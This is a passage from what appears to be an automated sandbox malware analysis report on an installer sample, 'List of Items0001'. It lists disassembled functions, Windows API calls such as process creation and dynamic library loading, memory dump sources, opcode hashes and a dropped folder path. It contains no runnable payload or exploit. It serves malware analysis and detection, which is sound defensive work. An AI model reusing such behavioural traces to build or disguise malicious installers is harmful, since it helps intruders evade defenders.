                                                • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                  • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                  • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                  • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                  • Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B13
                                                  • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                • String ID:
                                                • API String ID: 2972824698-0
                                                • Opcode ID: 9323cc5f74d4279da3a242e1114ef666756815fe95b2cddcc704206b053689ed
                                                • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                • Opcode Fuzzy Hash: 9323cc5f74d4279da3a242e1114ef666756815fe95b2cddcc704206b053689ed
                                                • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: b1c326c608d934edba5287c2ab9886205131f3591e80fc453df13221f151a9a0
                                                • Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
                                                • Opcode Fuzzy Hash: b1c326c608d934edba5287c2ab9886205131f3591e80fc453df13221f151a9a0
                                                • Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C

                                                Non-executed Functions

                                                Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                  • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                  • Part of subcall function 004068EF: CharPrevW.USER32(?,?,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                  • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                  • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                  • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$Call$H7B
                                                • API String ID: 2624150263-1674876323
                                                • Opcode ID: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                • Opcode Fuzzy Hash: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                Function 6DB61BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6DB612BB: GlobalAlloc.KERNEL32(00000040,?,6DB612DB,?,6DB6137F,00000019,6DB611CA,-000000A0), ref: 6DB612C5
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6DB61D2D
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6DB61D75
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6DB61D7F
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB61D92
                                                • GlobalFree.KERNEL32(?), ref: 6DB61E74
                                                • GlobalFree.KERNEL32(?), ref: 6DB61E79
                                                • GlobalFree.KERNEL32(?), ref: 6DB61E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB62068
                                                • lstrcpyW.KERNEL32(?,?), ref: 6DB62222
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6DB622A1
                                                • LoadLibraryW.KERNEL32(00000008), ref: 6DB622B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 6DB6230C
                                                • lstrlenW.KERNEL32(00000808), ref: 6DB62326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: c9ac9633c89436085c84f8c36d0acaadc3e13055fcaf37eb4db566381742bcbe
                                                • Instruction ID: d8511975624d3df5c1857921f5d98ef38c3ce78a3f82f9ef36ab81e0a035f806
                                                • Opcode Fuzzy Hash: c9ac9633c89436085c84f8c36d0acaadc3e13055fcaf37eb4db566381742bcbe
                                                • Instruction Fuzzy Hash: 00229D71D186CADFEB21CFA8C4806EEB7B0FB09395F54852ED1A5E7288D7709581CB60
                                                Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22, xrefs: 00402269
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22
                                                • API String ID: 542301482-1275126094
                                                • Opcode ID: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                • Opcode Fuzzy Hash: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 81649c9ef60b362743358cc04841f69d280dec374dabcafdd230337d8cd45dd0
                                                • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                • Opcode Fuzzy Hash: 81649c9ef60b362743358cc04841f69d280dec374dabcafdd230337d8cd45dd0
                                                • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                • DeleteObject.GDI32(00000000), ref: 0040512B
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                  • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                • GlobalFree.KERNEL32(?), ref: 0040546B
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                • ShowWindow.USER32(?,00000000), ref: 00405615
                                                • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                • ShowWindow.USER32(00000000), ref: 00405627
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                • Opcode Fuzzy Hash: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                • GetSysColor.USER32(?), ref: 00404863
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                • lstrlenW.KERNEL32(?), ref: 00404884
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                • SendMessageW.USER32(00000000), ref: 00404906
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                • SetCursor.USER32(00000000), ref: 00404985
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                • SetCursor.USER32(00000000), ref: 004049A1
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                  • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                  • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                • wsprintfA.USER32 ref: 0040632D
                                                • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
